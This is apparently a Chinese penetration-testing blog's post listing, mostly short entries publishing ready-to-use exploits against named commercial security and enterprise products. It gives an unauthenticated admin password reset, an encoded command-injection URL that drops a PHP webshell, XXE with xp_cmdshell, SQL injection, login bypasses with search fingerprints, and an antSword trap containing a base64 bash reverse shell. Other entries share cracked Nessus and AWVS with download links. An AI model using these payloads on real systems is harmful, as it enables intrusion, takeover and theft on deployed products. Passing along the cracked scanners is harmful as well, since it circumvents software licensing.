天融信数据防泄漏系统越权修改管理员密码 渗透测试

EEE26ECA-6A7F-4BA2-A274-713511D57CA5.jpeg


无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd

接口未授权访问,造成直接修改任意用户密码。:默认superman账户uid为1。


POST /?module=auth_user&action=mod_edit_pwd

Cookie: username=superman;


uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1


admin 发布于  2020-9-12 07:55 

齐治堡垒机前台远程命令执行漏洞 渗透测试

齐治堡垒机前台远程命令执行漏洞(CNVD-2019-20835)

未授权无需登录。

B3871B35-D8B3-4095-8032-D7512B3C6FDF.jpeg

1、访问 http://10.20.10.11/listener/cluster_manage.php  :返回 "OK".

2、访问如下链接即可getshell,执行成功后,生成PHP一句话马

3、/var/www/shterm/resources/qrcode/lbj77.php  密码10086

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}


admin 发布于  2020-9-12 07:41 

用友GRP-u8 注入+天融信TopApp-LB 负载均衡系统sql注入 渗透测试

用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。

GRP-u8.png


该系统被曝存在命令执行漏洞,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击,漏洞细节以及相关漏洞poc如下:

用友GRP-u8 XXE漏洞(XML External Entity-XML外部实体注入):


POST /Proxy HTTP/1.1

Accept: Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)

Host: host

Content-Length: 357

Connection: Keep-Alive

Cache-Control: no-cache

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>


burp里面repeat即可:

GRP-u8-exec.png


天融信TopApp-LB 负载均衡系统sql注入


POST /acc/clsf/report/datasource.php HTTP/1.1

Host:

Connection: close

Accept: text/javascript, text/html, application/xml, text/xml, */*

X-Prototype-Version: 1.6.0.3

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Sec-Fetch-Dest: empty

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57

Content-Type: application/x-www-form-urlencoded

Content-Length: 201

t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@


至于前面的sangfor EDR RCE漏洞已经发过了。


admin 发布于  2020-9-11 21:11 

绿盟UTS综合威胁探针管理员任意登录复现 渗透测试

背景:

绿盟全流量威胁分析解决方案针对原始流量进行采集和监控,对流量信息进行深度还原、存储、查询和分析,可以及时掌握重要信息系统相关网络安全威胁风险,及时检测漏洞、病毒木马、网络攻击情况,及时发现网络安全事件线索,及时通报预警重大网络安全威胁,调查、防范和打击网络攻击等恶意行为,保障重要信息系统的网络安全。

绿盟综合威胁探针设备版本V2.0R00F02SP02及之前存在此漏洞。

绿盟的邮件回应:

尊敬的客户:

您好!

近日,收到客户反馈我司UTS产品存在“管理员任意登录漏洞”,此漏洞经过内部确认已于2020年8月进行了漏洞修复,并已经联系了受影响客户进行设备升级。现将相关情况说明如下:

此漏洞属于UTS某API存在敏感信息泄露的问题,攻击者可以绕过密码验证登录UTS设备。攻击者利用web特殊请求获取管理员权限,可对设备进行管控,修改防护策略,查看攻击信息和内网地址等资产信息,威胁设备安全。

此问题不是0day漏洞,不会泄露用户明文密码,不存在命令注入漏洞,攻击者无法利用此漏洞跳转攻击其它设备。目前我们已经在UTSV2.0R00F02SP03版本完成修复,升级官网发布的UTSV2.0R00F02SP03/UTSV2.0R00F02SP04升级包均可以解决此问题。同时请客户升级后,及时修改账户密码。

对于不具备升级条件的客户,请联系绿盟技术人员,绿盟技术人员为您提供技术支持进行解决。为您带来的不便,我们深感抱歉。


绿盟科技集团股份有限公司

2020年9月11日


漏洞利用过程:

85EF8388-B048-4CD9-834B-519410CE9E28.jpeg



4391E19E-D112-42C5-977D-468BCF217DFD.jpeg

对响应包进行修改,将false更改为true的时候可以泄露管理用户的md5值密码

72668C88-D15F-488C-AAD3-D509066895F8.jpegAB9A0FA6-D926-4EB0-946B-FDD1C77A3599.jpeg7598C79E-D4C7-4C85-ACB0-4B7CA91E2CFD.jpeg




利用渠道的md5值去登录页面

59EFFBA3-E0E3-49E7-B992-4514E13F67BF.jpeg


替换为 admin密码的md5:

7ac301836522b54afcbbed714534c7fb

71D0D4D4-65F0-4169-A94A-B418164745F1.jpeg


成功登录,登录后通过管理员权限对设备进行管控,并且可以看到大量的攻击信息,泄露内部网络地址包括资产管理。

A395E4DF-F12C-4367-906C-BD0025560490.jpeg





admin 发布于  2020-9-11 17:38 

HW弹药库之深信服EDR 3.2.21 任意代码执行漏洞分析 技术文章

漏洞原理:

dev_linkage_launch.php 为设备联动的新入口点主要是将联动的接口构造成业务统一处理的接口
...


admin 发布于  2020-9-11 07:42 

HW弹药库之你的蚁剑shell还是你的shell吗? 技术文章

HW弹药库之你的蚁剑 shell 还是你的 shell 吗?可能从你的小宝贝变成了小叛徒哦!

——蚁剑 v2.1.8.1 查看站点 cookie html解析未过滤漏洞可反向 RCE

shell_test.png

0X0:背景

说来我等菜鸡是不会也没想过去审计这些工具源码,哪怕是开源的,都是拿来主义,大部分看官也是吧。

但是我这个人对于情报搜集特别感兴趣!时常监控一些开源项目或者官网的commit或者更新公告,这不前段时间就看到了芋头师傅(leohearts)提交了一个issue 包含了我的监控关键字 RCE

rce_issues.png

我当时就看了,当时复现了下,但是没有记录,等着 Medicean 师傅修好了我再发,前天,终于修了!距离提交的时间是十一天过后,可能师傅工作比较忙吧!

0X1:复现环节

打开我们的主角-antSword ,在关于程序里面可以看到版本为 v2.1.8.1,下面开始测试,首先在本地PHP环境目录写一个html文件,内容为:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <h3>蚁剑 查看站点 cookie 未过滤致 RCE 测试</h3>
    <script>document.cookie="a=<img src=x onerror='require(\"child_process\").exec(\"echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNjY2IDA+JjEK | base64 -d | bash\")'/>"</script>
</body>
</html>

然后在 antSword 里面添加我们的本地测试URL,密码 连接类型这些随便写,地址写对了就行

add_shell.png

添加好了之后,在本地使用 NC 监听 nc -lv 666 因为上面的 base64 编码后的就是反弹 shell 到我们的666端口,不多说,不懂得 Google

然后我们再用 antSword 右键的 查看站点(英文的为 View Site)即可触发获得一个 shell

view_site.png

看一下 Medicean 师傅的 commit 极了可以看到修复的方式是在 cookie 取值的部分添加了 noxss 方法来进行了 XSS 过滤

fix_256.png

0X2:漏洞利用

复现完毕后我就在思考,能不能借此做点小动作?答案是可以的!

想一下,本身是 html格式的URL地址,除了故意这么去复现的查看站点,很少有人拿到shell后去这么干!除非 shell 需要设置 cookie,从 cookie 里取值,这个时候就很容易想到蚁剑的 AES shell 需要设置 cookie ,那就有利用的可能了!

有两种情况,第一种是本身就是 PHP 的 shell ,如果 黑客的 webshell 是使用的 蚁剑的 AES webshell ,基本代码如下:

<?php
@session_start();
$pwd='ant';
$key=@substr(str_pad(session_id(),16,'a'),0,16);
@eval(openssl_decrypt(base64_decode($_POST[$pwd]), 'AES-128-ECB', $key, OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING));
?>

假如黑客 webshell 如上 名为 shell.php ,我们可以把他的 shell 改为如下内容:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <h3>蚁剑 查看站点 cookie 未过滤致 RCE 测试</h3>
    <?php
    @session_start();
    $pwd='ant';
    $key=@substr(str_pad(session_id(),16,'a'),0,16);
    @eval(openssl_decrypt(base64_decode($_POST[$pwd]), 'AES-128-ECB', $key, OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING));
    ?>
    <script>document.cookie="a=<img src=x onerror='require(\"child_process\").exec(\"echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNjY2IDA+JjEK | base64 -d | bash\")'/>"</script>
</body>
</html>

直接把他的 shell 改为 html 和 PHP 代码混写!

aes_shell_rce.png

因为 PHP 本身就可以这么写,而且可以同时执行 PHP 代码和 html 代码。

当然,真实情况下我们要做的隐蔽点 把 没必要的 标题和 H3 这些丢弃。改写后的 shell 如何让黑客再次使用 查看站点 功能来获取 cookie 这是个问题,需要让他原本保存的 cookie 失效,比如重启 PHP 清除缓存 等方法尝试,假设你达成了如上条件,成功清除了 黑客 shell cookie ,那么接下来就是他 连接 shell 发现连接不上,打开 shell 地址发现还在,可能会使用 查看站点的功能来 获取cookie ,就可以顺利的 获得一个反向shell。

shell_rce.png

测试是在 Mac 环境下测试,可以根据情况修改需要执行的操作,比如直接执行 CS 后门或者 PS下载执行 等等。

0X3:总结

这个漏洞很鸡肋!

其一:需要使用 查看站点功能;

其二:需要让之前的shell cookie 失效;

其三:配合特定的环境,比如解析漏洞或者.htaccess

但是也是一种思路,说不定你就可以借此反日 大黑阔!哈哈哈。各位朋友,使用工具须谨慎!说不定还要未公开的 XXday 等着你上钩呢!最起码 把工作和生活用电脑环境区分开,使用个虚拟机,虚拟机一定要开启自动升级,保持最新版,虚拟机里最好再套两层代理,保护自己,保护大家!

参考连接:

https://github.com/AntSwordProject/antSword/issues/256

https://github.com/AntSwordProject/antSword/commit/0d5b8b7c4f5f9520b0cacb7306beb190efa19881


admin 发布于  2020-9-7 00:48 

subdomain_shell-一键调用subfinder+ksubdomain_mac+httpx 技术文章

subdomain_shell

一键调用subfinder+ksubdomain+httpx 强强联合 从域名发现-->域名验证-->获取域名标题、状态码以及响应大小 最后保存结果,简化重复操作命令

因为懒 \-_-\ 不想重复写命令,故诞生此项目

暂时只写了个单域名的,后面找时间补上从文件加载多域名脚本 其实加个判断调整下基本上就OK,欢迎各位师傅 pull 啊
后期考虑加上 xray 的主动爬虫 来个简单的从域名到基本信息搜集的过程,可以做成定时任务,再入库?越来越复杂。。。拉闸 暂时先这样

tested on Mac & Ubuntu

食用方法

1.自行下载脚本,准备文件
2.下载我打包好的,下载解压开箱即用点我下载

Mac 脚本测试

运行后自动保存结果

Ubuntu 脚本测试

项目地址:https://github.com/Mr-xn/subdomain_shell 



admin 发布于  2020-9-4 13:51 

OpenWrt UnblockNeteaseMusicGo 插件 证书过期替换 技术文章

事件起因是我想听的歌曲,在网抑云听不了,我都开了VIP,还是由于版权原因,听不了。。。我难道要每一家都去开vip吗?同时开通每一家的VIP?没那个精力和金钱!那就用路由器搞起来!

vip.png 

打开路由器发现解锁音乐的插件是关闭的,我打开后发现没起作用不说,正常的歌曲也打不开了,

打开music.163.com发现证书错误:

music_ssl.png 

我这个是由于我前一天没更新插件之前,已经手动替换过证书了可以使用了,当时也是证书错误,提示的是证书过期了。。。

前一天的证书替换过程参考如下:

➜  ~ openssl genrsa -out ca.key 2048
Generating RSA private key, 2048 bit long modulus
..............................+++
..............................................................+++
e is 65537 (0x10001)
➜  ~ openssl req -x509 -new -nodes -key ca.key -sha256 -days 1825 -out ca.crt -subj "/C=CN/CN=UnblockNeteaseMusic Root CA/O=netmusic"
➜  ~ openssl genrsa -out server.key 2048
Generating RSA private key, 2048 bit long modulus
.....................................+++
.....................+++
e is 65537 (0x10001)
➜  ~ openssl req -new -sha256 -key server.key -out server.csr -subj "/C=CN/L=Hangzhou/O=NetEase (Hangzhou) Network Co., Ltd/OU=IT Dept./CN=*.music.163.com"
➜  ~ openssl x509 -req -extfile <(printf "extendedKeyUsage=serverAuth\nsubjectAltName=DNS:music.163.com,DNS:*.music.163.com") -sha256 -days 365 -in server.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out server.crt
Signature ok
subject=/C=CN/L=Hangzhou/O=NetEase (Hangzhou) Network Co., Ltd/OU=IT Dept./CN=*.music.163.com
Getting CA Private Key
➜  ~ ls
Applications               Public
Applications (Parallels)   Virtual Machines.localized
Desktop                    WeChatExtension-ForMac
Documents                  ca.crt
Downloads                  ca.key
Library                    ca.srl
Movies                     iCloud云盘(归档)
Music                      server.crt
Parallels                  server.csr
Pictures                   server.key
➜  ~ pwd

将server.crt server.key 替换掉,路径如下

root@OpenWrt:~# ls -l /usr/share/UnblockNeteaseMusicGo
-rw-r--r--    1 root     root          1675 Aug 31 13:10 ca.key
-rw-r--r--    1 root     root          1281 Aug 31 13:10 server.crt
-rw-r--r--    1 root     root          1679 Aug 31 13:10 server.key
root@OpenWrt:~#

再把ca.crt 安装到本机并信任就OK。

下面说一下如何更新插件,我是自己编译的插件,已经打包在GitHub仓库了,可以自己下载,链接放在最后。

你可以通过路由后台的文件上传或者是手动使用scp或者其他工具将插件上传到/tmp/目录,然后使用dpkg install 插件包名 来安装更新。我这个固件本身后台有文件上传:

music_go.png 

update_plugin.png 

上传完毕,就可以自行安装了。安装更新后就可以去网易云音乐解锁那个界面下载ca证书,然后本地安装,信任:

ssl_add.png 

cert_set.png 

搞定后,打开网易云官网,查看证书,就是我们自己的证书,都OK了

new_ssl.png



编译备份插件文件列表:

编译时间:2020/09/01
.
├── brcmfmac-firmware-usb_20200619-1_arm_cortex-a9.ipk
├── busybox_1.31.1-2_arm_cortex-a9.ipk
├── ca-certificates_20200601-1_all.ipk
├── coremark_2020-05-28-7685fd32-15_arm_cortex-a9.ipk
├── ddns-scripts_aliyun_1.0.3-1_all.ipk
├── ddns-scripts_dnspod_1.0.2-1_all.ipk
├── default-settings_2-3_all.ipk
├── dns2socks_2.1-1_arm_cortex-a9.ipk
├── dnsmasq-full_2.81-7_arm_cortex-a9.ipk
├── dropbear_2020.80-1_arm_cortex-a9.ipk
├── firewall_2019-11-22-8174814a-1_arm_cortex-a9.ipk
├── getrandom_2019-12-31-0e34af14-4_arm_cortex-a9.ipk
├── hostapd-common_2020-06-08-5a8b3662-4_arm_cortex-a9.ipk
├── ip-full_5.7.0-2_arm_cortex-a9.ipk
├── ipset_7.4-1_arm_cortex-a9.ipk
├── ipt2socks_1.1.3-1_arm_cortex-a9.ipk
├── iptables-mod-fullconenat_2019-10-21-0cf3b48f-3_arm_cortex-a9.ipk
├── iw_5.4-1_arm_cortex-a9.ipk
├── jshn_2020-05-25-66195aee-1_arm_cortex-a9.ipk
├── jsonfilter_2018-02-04-c7e938d6-1_arm_cortex-a9.ipk
├── k3screenctrl_0.10-2_arm_cortex-a9.ipk
├── k3wifi_1-2_arm_cortex-a9.ipk
├── libblobmsg-json_2020-05-25-66195aee-1_arm_cortex-a9.ipk
├── libelf1_0.179-1_arm_cortex-a9.ipk
├── libevent2-7_2.1.11-2_arm_cortex-a9.ipk
├── libipset13_7.4-1_arm_cortex-a9.ipk
├── libjson-c4_0.13.1-2_arm_cortex-a9.ipk
├── libjson-script_2020-05-25-66195aee-1_arm_cortex-a9.ipk
├── liblua5.1.5_5.1.5-7_arm_cortex-a9.ipk
├── libmbedtls12_2.16.7-1_arm_cortex-a9.ipk
├── libmnl0_1.0.4-2_arm_cortex-a9.ipk
├── libnl-tiny_2019-10-29-0219008c-1_arm_cortex-a9.ipk
├── libopenssl1.1_1.1.1g-1_arm_cortex-a9.ipk
├── libopenssl-conf_1.1.1g-1_arm_cortex-a9.ipk
├── libpcre_8.44-2_arm_cortex-a9.ipk
├── libubox20191228_2020-05-25-66195aee-1_arm_cortex-a9.ipk
├── libubus20191227_2020-02-05-171469e3-1_arm_cortex-a9.ipk
├── libubus-lua_2020-02-05-171469e3-1_arm_cortex-a9.ipk
├── libuci_2018-08-11-4c8b4d6e-2_arm_cortex-a9.ipk
├── libuci-lua_2018-08-11-4c8b4d6e-2_arm_cortex-a9.ipk
├── libuclient20160123_2020-06-17-c6609861-1_arm_cortex-a9.ipk
├── libustream-openssl20200215_2020-03-13-5e1bc342-1_arm_cortex-a9.ipk
├── libuuid1_2.35.1-2_arm_cortex-a9.ipk
├── logd_2019-12-31-0e34af14-4_arm_cortex-a9.ipk
├── lua_5.1.5-7_arm_cortex-a9.ipk
├── luci-app-accesscontrol_1-11_all.ipk
├── luci-app-arpbind_1-3_all.ipk
├── luci-app-autoreboot_1.0-8_all.ipk
├── luci-app-cpufreq_1-5_all.ipk
├── luci-app-filetransfer_1-2_all.ipk
├── luci-app-ramfree_1.0-1_all.ipk
├── luci-app-sfe_1.0-13_all.ipk
├── luci-app-ttyd_1.0-3_all.ipk
├── luci-app-unblockmusic_2.3.5-9_all.ipk
├── luci-app-vlmcsd_1.0-5_all.ipk
├── luci-app-vsftpd_1.0-3_all.ipk
├── luci-app-webadmin_2-1_all.ipk
├── luci-i18n-accesscontrol-zh-cn_1-11_all.ipk
├── luci-i18n-arpbind-zh-cn_1-3_all.ipk
├── luci-i18n-autoreboot-zh-cn_1.0-8_all.ipk
├── luci-i18n-cpufreq-zh-cn_1-5_all.ipk
├── luci-i18n-filetransfer-zh-cn_1-2_all.ipk
├── luci-i18n-ramfree-zh-cn_1.0-1_all.ipk
├── luci-i18n-sfe-zh-cn_1.0-13_all.ipk
├── luci-i18n-ttyd-zh-cn_1.0-3_all.ipk
├── luci-i18n-unblockmusic-zh-cn_2.3.5-9_all.ipk
├── luci-i18n-vlmcsd-zh-cn_1.0-5_all.ipk
├── luci-i18n-vsftpd-zh-cn_1.0-3_all.ipk
├── luci-i18n-webadmin-zh-cn_2-1_all.ipk
├── luci-lib-fs_1.0-1_all.ipk
├── microsocks_1.0-1_arm_cortex-a9.ipk
├── netifd_2020-06-06-51e9fb81-1_arm_cortex-a9.ipk
├── openssl-util_1.1.1g-1_arm_cortex-a9.ipk
├── openwrt-keyring_2019-07-25-8080ef34-1_arm_cortex-a9.ipk
├── opkg_2020-05-07-f2166a89-1_arm_cortex-a9.ipk
├── Packages
├── Packages.gz
├── Packages.manifest
├── Packages.sig
├── pdnsd-alt_1.2.9b-par-a8e46ccba7b0fa2230d6c42ab6dcd92926f6c21d_arm_cortex-a9.ipk
├── ppp_2.4.8-5_arm_cortex-a9.ipk
├── ppp-mod-pppoe_2.4.8-5_arm_cortex-a9.ipk
├── procd_2020-05-28-b9b39e20-2_arm_cortex-a9.ipk
├── redsocks2_0.67-4_arm_cortex-a9.ipk
├── resolveip_2_arm_cortex-a9.ipk
├── rpcd_2020-05-26-078bb57e-1_arm_cortex-a9.ipk
├── shadowsocksr-libev-alt_2.5.6-5_arm_cortex-a9.ipk
├── shadowsocksr-libev-server_2.5.6-5_arm_cortex-a9.ipk
├── shadowsocksr-libev-ssr-local_2.5.6-5_arm_cortex-a9.ipk
├── shellsync_0.2-2_arm_cortex-a9.ipk
├── simple-obfs_0.0.5-5_arm_cortex-a9.ipk
├── swconfig_12_arm_cortex-a9.ipk
├── trojan_1.16.0-1_arm_cortex-a9.ipk
├── ubox_2019-12-31-0e34af14-4_arm_cortex-a9.ipk
├── ubus_2020-02-05-171469e3-1_arm_cortex-a9.ipk
├── ubusd_2020-02-05-171469e3-1_arm_cortex-a9.ipk
├── uci_2018-08-11-4c8b4d6e-2_arm_cortex-a9.ipk
├── uclient-fetch_2020-06-17-c6609861-1_arm_cortex-a9.ipk
├── uhttpd_2020-06-03-939c281c-2_arm_cortex-a9.ipk
├── uhttpd-mod-ubus_2020-06-03-939c281c-2_arm_cortex-a9.ipk
├── UnblockNeteaseMusicGo_0.2.4-1_arm_cortex-a9.ipk
├── urandom-seed_1.0-2_arm_cortex-a9.ipk
├── urngd_2020-01-21-c7f7b6b6-1_arm_cortex-a9.ipk
├── usign_2020-05-23-f1f65026-1_arm_cortex-a9.ipk
├── v2ray_4.27.4-1_arm_cortex-a9.ipk
├── v2ray-plugin_1.4.1-1_arm_cortex-a9.ipk
├── vlmcsd_svn1113-1_arm_cortex-a9.ipk
├── vsftpd-alt_3.0.3-7_arm_cortex-a9.ipk
├── wget_1.20.3-4_arm_cortex-a9.ipk
├── wireless-regdb_2020.04.29-1_all.ipk
├── wol_0.7.1-3_arm_cortex-a9.ipk
├── wpad-basic_2020-06-08-5a8b3662-4_arm_cortex-a9.ipk
└── zlib_1.2.11-3_arm_cortex-a9.ipk

0 directories, 113 files



插件GitHub仓库链接:

https://github.com/Mr-xn/k3_packages_backup

参考链接:

https://netflixcn.com/miji/id-50.html&nbsp;

https://github.com/nondanee/UnblockNeteaseMusic/

https://github.com/nondanee/UnblockNeteaseMusic/issues/48#issuecomment-477870013


标签: 分享 github

admin 发布于  2020-9-2 01:07 

关于Nessus的新插件包使用和AWVS最新版的使用方式 技术文章

一直都有朋友在留言或者邮件找我,问我是不是 Nessus 新的插件包不能在旧版本使用了,我今天测试了,是可以使用的。还是结合我之前发的哪个版本的,具体的可以看这里:Nessus v8.9.1 系列Windows10上安装激活无IP限制版本 ,今天我测试了下新的插件包:all-2.0(20200825).tar 为例,简单的说下如何使用,

前提:先停止 Nessus 服务,net stop "Tenable Nessus" (需要管理员权限),详细的可以看上面的文章,有说明。

一句话总结:

关闭 Nessus 服务,下载插件包 all-2.0(20200825).tar ,然后解压到一个地方,然后以管理员权限打开命令提示符cmd窗口,使用 copy 命令覆盖替换到 Nessus 的插件包目录,开启 Nessus 服务,打开浏览器,等待重新加载插件即可。

啰嗦的解释:

一般路径为 Nessus 的安装路径下的 Nessus\nessus\plugins ,请自行查看你的安装路径,找到 plugin 目录,复制路径。然后进入到你的 Nessus 安装路径,我的路径是 D:\Nessus\nessus\plugins\,  然后记住解压后的路径,例如解压在 D:\downlods\all-2.0(20200825)\ ,就在 命令行 cd D:\Nessus\nessus\plugins\  回车后,执行:copy D:\downlods\all-2.0(20200825)* ./  /Y

回车后 等待几分钟,文件有点多,十二万三千多个,推荐这种命令行方式复制,图形界面,怕你卡死了....

复制完毕,开启 Nessus 服务。,打开浏览器,等待加载插件完毕即可使用。
Nessus_plugins_202008250301.png 

下面简单说下awvs acunetix_13.0.200807155 windows版本的和谐使用,目前最新版本可以使用的,激活状态如下:aws13.0.200807155.png 
aws.license.13.0.200807155.png 

也可以设置中文,路径在 administer-profile-language 选择中文即可,前提是上面要求填写的都需要填写好,然后保存即可。
aws.language.png 

目前只有windows版本的工具 patch4awvs13.0.200715107 可以使用,对于目前最新版的 也适用acunetix_13.0.200807155。

awvs 13.0.200807155
windows下载:Acunetix Windows and Linux 13.0.200807155 and macOS: 13.0.200807156 download now

相关插件包和工具下载:
Nessus 插件包all-2.0(20200825).tar:

https://cloud.189.cn/t/E7Zja27bM32y(访问码:qp4h

也提供一个我上篇文章的初始版本的插件包all-2.0(20200321).tar:

https://cloud.189.cn/t/nmYzyuZni2ey(访问码:mvj5
awvs 工具:https://cloud.189.cn/t/a2QRn2FBFJNj(访问码:9hs9


鉴于大家各种安装错误,我自己在虚拟机全部安装了一遍,做个总结:

1.Nessus 8.9.1 是可以成功安装,并且可以更新到最新插件包:all-2.0_20200828.tar.gz 也是可以扫描的!不要再问重复的问题了,头大。
nessus_0828.png 

2.Nessus的插件更新还是可以使用这种方法来更新,你可以在安装完毕后,停止Nessus服务直接更新到最新的插件包:
nessus_update_plugins.png 

3.awvs最新版的acunetix_13.0.200807155 也是可以通过patch4awvs13.0.200715107破解的(貌似没法扫描。。。暂解决).

4.如果安装完毕了之后,打开页面是空白的或者是其他错误,更换下浏览器试试,我测试的机器是chrome最新版,Firefox浏览器有几率打开awvs的页面是空白,推荐统一使用最新版的chrome浏览器。

5.终极大招:我把上述的工具打包成了虚拟机。你实在需要使用,但是自己没有配置安装好的,可以下载使用。
all-2.0_20200828.tar.gz插件下载:

https://cloud.189.cn/t/yUr2qeZra2Ab(访问码:0iic

https://mega.nz/folder/LRFCiIAC#zIilB3PQU8nrZu4DVEIAQw


虚拟机文件还在上传,上传完毕更新到这里。

parallels desktop 16 :https://cloud.189.cn/t/Vzy6ZraEZVni(访问码:5njj

Mac 平台pd虚拟机镜像:https://cloud.189.cn/t/ArQrIfMRnqui(访问码:rno0


windows vmware可用的镜像:https://cloud.189.cn/t/ui2QvqQ7ZzQz(访问码:dz5d

Nessus-8.9.1-debian6_amd64.deb下载: https://cloud.189.cn/t/EBju6jVJn6z2 (访问码:zc7w)


admin 发布于  2020-8-31 19:23 

HW礼盒:深信服edr RCE,天融信dlp unauth和通达OA v11.6版本RCE 渗透测试

HW礼盒,请查收:
深信服edr RCE
https://ip+端口/tool/log/c.php?strip_slashes=system&host=id 即可执行命令,
深信服EDR RCE (1).png
除上面之外,还有任意文件读取,验证码绕过,还有就是rce
任意用户登录:
注:2020年08月18日,fofa是通杀,版本小于 3.2.19
fofa指纹: title="SANGFOR终端检测响应平台"
payload:target+/ui/login.php?user=admin 即可直接登录:
SANGFOR (1).png
漏洞剖析:
在源码的:/web/ui/login.php 文件里面
登录判断的代码有一处让人感觉坑爹的地方:
SANGFOR-login (1).png


天融信dlp-未授权+越权

漏洞影响:已知版本号v3.1130.308p3_DLP.1

风险等级:高

漏洞细节:管理员登陆系统之后修改密码,未采用原由码校验,且存在未授权访问导致存在了越权修改管理员密码.

默认用户superman的uid=1

POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1

修复==》找官网

奇安信天擎EDR管理服务器远程命令执行RCE漏洞:
漏洞描述:
影响范围:使用奇安信天擎EDR产品的主机
暂时不详
说明:
该漏洞通过深信服SSLVPN进入内网后,利用这类漏洞控制所有装有edr的机器。

深信服 vpn rce 漏洞详情暂时未知

致远OA-A8-V5最新版未授权getshell--七月火师傅暂未公开

通达OA11.6 preauth RCE
https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/tools/%E9%80%9A%E8%BE%BEOA_v11.6_RCE_EXP.py 


admin 发布于  2020-8-20 13:22